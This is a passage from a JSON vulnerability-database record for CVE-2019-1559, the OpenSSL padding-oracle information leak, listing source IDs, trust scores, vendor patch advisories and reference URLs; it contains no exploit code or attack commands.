}, { "db": "TENABLE", "id": "TNS-2019-02", "trust": 1.8 }, { "db": "MCAFEE", "id": "SB10282", "trust": 1.8 }, { "db": "BID", "id": "107174", "trust": 1.8 }, { "db": "JVNDB", "id": "JVNDB-2019-002098", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201902-956", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "151886", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "158377", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "155415", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.4479.2", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.3729", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.0102", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.2383", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.3462", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.0487", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4083", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.0620", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.0751.2", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.4558", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.0192", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.4479", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.0032", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.4255", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.4297", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.0666", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.4405", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.3390.4", "trust": 0.6 }, { "db": "PULSESECURE", "id": "SA44019", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "151885", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "151918", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "154042", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-147651", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2019-1559", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "154009", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "155413", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "153932", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "154008", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169635", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-147651" }, { "db": "VULMON", "id": "CVE-2019-1559" }, { "db": "JVNDB", "id": "JVNDB-2019-002098" }, { "db": "PACKETSTORM", "id": "154009" }, { "db": "PACKETSTORM", "id": "158377" }, { "db": "PACKETSTORM", "id": "155413" }, { "db": "PACKETSTORM", "id": "151885" }, { "db": "PACKETSTORM", "id": "155415" }, { "db": "PACKETSTORM", "id": "153932" }, { "db": "PACKETSTORM", "id": "154008" }, { "db": "PACKETSTORM", "id": "169635" }, { "db": "CNNVD", "id": "CNNVD-201902-956" }, { "db": "NVD", "id": "CVE-2019-1559" } ] }, "id": "VAR-201902-0192", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-147651" } ], "trust": 0.36447732666666666 }, "last_update_date": "2024-07-23T20:34:36.580000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "hitachi-sec-2019-132 Software product security information", "trust": 0.8, "url": "https://usn.ubuntu.com/3899-1/" }, { "title": "OpenSSL Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=89673" }, { "title": "Red Hat: Moderate: openssl security and bug fix update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20192304 - security advisory" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20192471 - security advisory" }, { "title": "Ubuntu Security Notice: openssl, openssl1.0 vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3899-1" }, { "title": "Debian Security Advisories: DSA-4400-1 openssl1.0 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=675a6469b3fad3c9a56addc922ae8d9d" }, { "title": "Red Hat: Moderate: rhvm-appliance security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20192439 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.2 security release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193929 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.2 security release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193931 - security advisory" }, { "title": "Red Hat: Important: Red Hat Virtualization security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20192437 - security advisory" }, { "title": "Red Hat: CVE-2019-1559", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2019-1559" }, { "title": "Arch Linux Advisories: [ASA-201903-2] openssl-1.0: information disclosure", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201903-2" }, { "title": "Arch Linux Advisories: [ASA-201903-6] lib32-openssl-1.0: information disclosure", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201903-6" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2019-1559" }, { "title": "Amazon Linux AMI: ALAS-2019-1188", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2019-1188" }, { "title": "Amazon Linux 2: ALAS2-2019-1362", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2019-1362" }, { "title": "Amazon Linux 2: ALAS2-2019-1188", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2019-1188" }, { "title": "IBM: IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Spectrum Protect Backup-Archive Client NetApp Services (CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=884ffe1be805ead0a804f06f7c14072c" }, { "title": "IBM: IBM Security Bulletin: IBM Security Proventia Network Active Bypass is affected by openssl vulnerabilities (CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1092f7b64100b0110232688947fb97ed" }, { "title": "IBM: IBM Security Bulletin: Guardium StealthBits Integration is affected by an OpenSSL vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=6b4ff04f16b62df96980d37251dc9ae0" }, { "title": "IBM: IBM Security Bulletin: IBM InfoSphere Master Data Management Standard and Advanced Editions are affected by vulnerabilities in OpenSSL (CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=7856a174f729c96cf2ba970cfef5f604" }, { "title": "IBM: IBM Security Bulletin: OpenSSL vulnerability affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) (CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=04a72ac59f1cc3a5b02c155d941c5cfd" }, { "title": "IBM: IBM Security Bulletin: IBM DataPower Gateway is affected by a padding oracle vulnerability (CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=9c55c211aa2410823d4d568143afa117" }, { "title": "IBM: Security Bulletin: OpenSSL vulnerabilites impacting Aspera High-Speed Transfer Server, Aspera Desktop Client 3.9.1 and earlier (CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c233af3070d7248dcbafadb6b367e2a1" }, { "title": "IBM: IBM Security Bulletin: IBM QRadar Network Security is affected by openssl vulnerabilities (CVE-2019-1559, CVE-2018-0734)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=7ceb7cf440b088f91358d1c597d5a414" }, { "title": "IBM: IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Rational ClearCase (CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c0b11f80d1ecd798a97f3bda2b68f830" }, { "title": "IBM: IBM Security Bulletin: Vulnerability CVE-2019-1559 in OpenSSL affects IBM i", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=12860155d0bf31ea6e2e3ffcef7ea7e0" }, { "title": "IBM: IBM Security Bulletin: Vulnerability in OpenSSL affects AIX (CVE-2019-1559) Security Bulletin", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=2709308a62e1e2fafc2e4989ef440aa3" }, { "title": "IBM: IBM Security Bulletin: Multiple Vulnerabilities in OpenSSL affect IBM Worklight and IBM MobileFirst Platform Foundation", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1b873a45dce8bb56ff011908a9402b67" }, { "title": "IBM: IBM Security Bulletin: Node.js as used in IBM QRadar Packet Capture is vulnerable to the following CVE\u2019s (CVE-2019-1559, CVE-2019-5737, CVE-2019-5739)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=aae1f2192c5cf9375ed61f7a27d08f64" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities affect IBM Cloud Private (CVE-2019-5739 CVE-2019-5737 CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8b00742d4b57e0eaab4fd3f9a2125634" }, { "title": "IBM: IBM Security Bulletin: Vulnerabilities in OpenSSL affect GCM16 \u0026 GCM32 and LCM8 \u0026 LCM16 KVM Switch Firmware (CVE-2018-0732 CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ca67e77b9edd2ad304d2f2da1853223f" }, { "title": "IBM: IBM Security Bulletin: Vulnerabilities in GNU OpenSSL (1.0.2 series) affect IBM Netezza Analytics", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ac5ccbde4e4ddbcabd10cacf82487a11" }, { "title": "IBM: Security Bulletin: Vulnerabities in SSL in IBM DataPower Gateway", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=5fc1433ca504461e3bbb1d30e408592c" }, { "title": "Hitachi Security Advisories: Vulnerability in Cosminexus HTTP Server", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2019-112" }, { "title": "Hitachi Security Advisories: Vulnerability in JP1", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2019-132" }, { "title": "IBM: IBM Security Bulletin: Security vulnerabilities identified in OpenSSL affect Rational Build Forge (CVE-2018-0734, CVE-2018-5407 and CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=e59d7f075c856823d6f7370dea35e662" }, { "title": "Debian CVElist Bug Report Logs: mysql-5.7: Security fixes from the April 2019 CPU", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5f1bd0287d0770973261ab8500c6982b" }, { "title": "IBM: IBM Security Bulletin: Vulnerability in Node.js affects IBM Integration Bus \u0026 IBM App Connect Enterprise V11", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1a7cb34592ef045ece1d2b32c150f2a2" }, { "title": "IBM: IBM Security Bulletin: Secure Gateway is affected by multiple vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=28830011b173eee360fbb2a55c68c9d3" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities affect IBM\u00ae SDK for Node.js\u2122 in IBM Cloud", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8db7a9036f52f1664d12ac73d7a3506f" }, { "title": "IBM: IBM Security Bulletin: Security vulnerabilities in IBM SDK for Node.js might affect the configuration editor used by IBM Business Automation Workflow and IBM Business Process Manager (BPM)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=6b74f45222d8029af7ffef49314f6056" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=4ee609eeae78bbbd0d0c827f33a7f87f" }, { "title": "Tenable Security Advisories: [R1] Nessus Agent 7.4.0 Fixes One Third-party Vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2019-03" }, { "title": "Forcepoint Security Advisories: CVE-2018-0734 and CVE-2019-1559 (OpenSSL)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=b508c983da563a8786bf80c360afb887" }, { "title": "Hitachi Security Advisories: Multiple Vulnerabilities in JP1/Automatic Job Management System 3 - Web Operation Assistant", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-121" }, { "title": "Palo Alto Networks Security Advisory: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=217c2f4028735d91500e325e8ba1cbba" }, { "title": "Palo Alto Networks Security Advisory: CVE-2019-1559 OpenSSL vulnerability CVE-2019-1559 has been resolved in PAN-OS", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=a16107c1f899993837417057168db200" }, { "title": "IBM: IBM Security Bulletin:IBM Security Identity Adapters has released a fix in response to the OpenSSL vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=00b8bc7d11e5484e8721f3f62ec2ce87" }, { "title": "IBM: Security Bulletin: Vulnerabilities have been identified in OpenSSL and the Kernel shipped with the DS8000 Hardware Management Console (HMC)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=423d1da688755122eb2591196e4cc160" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities affect IBM Watson Assistant for IBM Cloud Pak for Data", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1e6142e07a3e9637110bdfa17e331459" }, { "title": "IBM: IBM Security Bulletin: Multiple Vulnerabilities in Watson Openscale (Liberty, Java, node.js)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=a47e10150b300f15d2fd55b9cdaed12d" }, { "title": "Tenable Security Advisories: [R1] Nessus 8.3.0 Fixes Multiple Third-party Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2019-02" }, { "title": "IBM: IBM Security Bulletin: BigFix Platform 9.5.x / 9.2.x affected by multiple vulnerabilities (CVE-2018-16839, CVE-2018-16842, CVE-2018-16840, CVE-2019-3823, CVE-2019-3822, CVE-2018-16890, CVE-2019-4011, CVE-2018-2005, CVE-2019-4058, CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=0b05dc856c1be71db871bcea94f6fa8d" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been addressed in IBM Security Access Manager Appliance", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=800337bc69aa7ad92ac88a2adcc7d426" }, { "title": "IBM: IBM Security Bulletin: Vyatta 5600 vRouter Software Patches \u2013 Releases 1801-w and 1801-y", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=bf3f2299a8658b7cd3984c40e7060666" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2019-1559 " }, { "title": "Centos-6-openssl-1.0.1e-58.pd1trfir", "trust": 0.1, "url": "https://github.com/datourist/centos-6-openssl-1.0.1e-58.pd1trfir " }, { "title": "", "trust": 0.1, "url": "https://github.com/tls-attacker/tls-padding-oracles " }, { "title": "TLS-Padding-Oracles", "trust": 0.1, "url": "https://github.com/rub-nds/tls-padding-oracles " }, { "title": "vyger", "trust": 0.1, "url": "https://github.com/mrodden/vyger " }, { "title": "", "trust": 0.1, "url": "https://github.com/vincent-deng/veracode-container-security-finding-parser " } ], "sources": [ { "db": "VULMON", "id": "CVE-2019-1559" }, { "db": "JVNDB", "id": "JVNDB-2019-002098" }, { "db": "CNNVD", "id": "CNNVD-201902-956" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-203", "trust": 1.1 }, { "problemtype": "information leak (CWE-200) [NVD Evaluation ]", "trust": 0.8 }, { "problemtype": "CWE-200", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-147651" }, { "db": "JVNDB", "id": "JVNDB-2019-002098" }, { "db": "NVD", "id": "CVE-2019-1559" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.6, "url": "http://www.securityfocus.com/bid/107174" }, { "trust": 2.5, "url": "https://access.redhat.com/errata/rhsa-2019:3929" }, { "trust": 2.5, "url": "https://access.redhat.com/errata/rhsa-2019:3931" }, { "trust": 2.4, "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "trust": 2.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1559" }, { "trust": 2.0, "url": "https://access.redhat.com/errata/rhsa-2019:2304" }, { "trust": 1.9, "url": "https://www.openssl.org/news/secadv/20190226.txt" }, { "trust": 1.9, "url": "https://access.redhat.com/errata/rhsa-2019:2437" }, { "trust": 1.9, "url": "https://access.redhat.com/errata/rhsa-2019:2439" }, { "trust": 1.9, "url": "https://usn.ubuntu.com/3899-1/" }, { "trust": 1.8, "url": "https://security.netapp.com/advisory/ntap-20190301-0001/" }, { "trust": 1.8, "url": "https://security.netapp.com/advisory/ntap-20190301-0002/" }, { "trust": 1.8, "url": "https://security.netapp.com/advisory/ntap-20190423-0002/" }, { "trust": 1.8, "url": "https://www.tenable.com/security/tns-2019-02" }, { "trust": 1.8, "url": "https://www.tenable.com/security/tns-2019-03" }, { "trust": 1.8, "url": "https://www.debian.org/security/2019/dsa-4400" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201903-10" }, { "trust": 1.8, "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "trust": 1.8, "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "trust": 1.8, "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "trust": 1.8, "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "trust": 1.8, "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00003.html" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2019:2471" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00041.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00019.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00046.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00047.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00049.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00080.html" }, { "trust": 1.8, "url": "https://usn.ubuntu.com/4376-2/" }, { "trust": 1.7, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10282" }, { "trust": 1.2, "url": "https://support.f5.com/csp/article/k18549143" }, { "trust": 1.1, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ewc42uxl5ghtu5g77vkbf6jyuungshom/" }, { "trust": 1.1, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/zbev5qgdrfuzdmnecfxusn5fmyozde4v/" }, { "trust": 1.1, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/y3ivfgserazlnjck35tem2r4726xih3z/" }, { "trust": 1.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=e9bbefbf0f24c57645e7ad6a5a71ae649d18ac8e" }, { "trust": 1.1, "url": "https://support.f5.com/csp/article/k18549143?utm_source=f5support\u0026amp%3butm_medium=rss" }, { "trust": 0.7, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9bbefbf0f24c57645e7ad6a5a71ae649d18ac8e" }, { "trust": 0.7, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/zbev5qgdrfuzdmnecfxusn5fmyozde4v/" }, { "trust": 0.7, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/y3ivfgserazlnjck35tem2r4726xih3z/" }, { "trust": 0.7, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ewc42uxl5ghtu5g77vkbf6jyuungshom/" }, { "trust": 0.6, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory30.asc" }, { "trust": 0.6, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44019/?l=en_us\u0026atype=sa\u0026fs=search\u0026pn=1\u0026atype=sa" }, { "trust": 0.6, "url": "https://www.oracle.com/technetwork/topics/security/bulletinapr2019-5462008.html" }, { "trust": 0.6, "url": "https://github.com/rub-nds/tls-padding-oracles" }, { "trust": 0.6, "url": "http://openssl.org/" }, { "trust": 0.6, "url": "https://support.f5.com/csp/article/k18549143?utm_source=f5support\u0026utm_medium=rss" }, { "trust": 0.6, "url": "https://support.symantec.com/us/en/article.symsa1490.html" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170328" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170340" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170334" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170322" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170352" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170346" }, { "trust": 0.6, "url": "https://nodejs.org/en/blog/vulnerability/february-2019-security-releases/" }, { "trust": 0.6, "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20190572-1/" }, { "trust": 0.6, "url": "https://usn.ubuntu.com/4212-1/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1115655" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1115649" }, { "trust": 0.6, "url": "https://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/ hitachi-sec-2019-132/index.html" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/2016771" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/2020677" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/2027745" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1126581" }, { "trust": 0.6, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hitachi-sec-2019-132/index.html" }, { "trust": 0.6, "url": "http://www.ubuntu.com/usn/usn-3899-1" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/76438" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-tivoli-netcool-system-service-monitors-application-service-monitors-cve-2018-5407cve-2020-1967cve-2018-0734cve-2019-1563cve-2019/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4405/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1116357" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4558/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4479/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.3729/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/76230" }, { "trust": 0.6, "url": "https://www.oracle.com/security-alerts/cpujan2020verbose.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.0032/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.0487/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1115643" }, { "trust": 0.6, "url": "https://vigilance.fr/vulnerability/openssl-1-0-2-information-disclosure-via-0-byte-record-padding-oracle-28600" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/3517185" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1167202" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-as-used-by-ibm-qradar-siem-is-missing-a-required-cryptographic-step-cve-2019-1559/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.0192/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.3390.4/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssl-affects-ibm-integrated-analytics-system/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4479.2/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.3462/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.4083" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/155415/red-hat-security-advisory-2019-3929-01.html" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6520674" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-have-been-identified-in-openssl-and-the-kernel-shipped-with-the-ds8000-hardware-management-console-hmc/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/76782" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rackswitch-firmware-products-are-affected-by-the-following-opensll-vulnerability/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.2383/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.4255/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4297/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.0102/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1143442" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-in-openssh-and-openssl-shipped-with-ibm-security-access-manager-appliance-cve-2018-15473-cve-2019-1559/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1105965" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/158377/ubuntu-security-notice-usn-4376-2.html" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1106553" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-public-disclosed-vulnerability-from-openssl-affect-ibm-netezza-host-management/" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/151886/slackware-security-advisory-openssl-updates.html" }, { "trust": 0.5, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.5, "url": 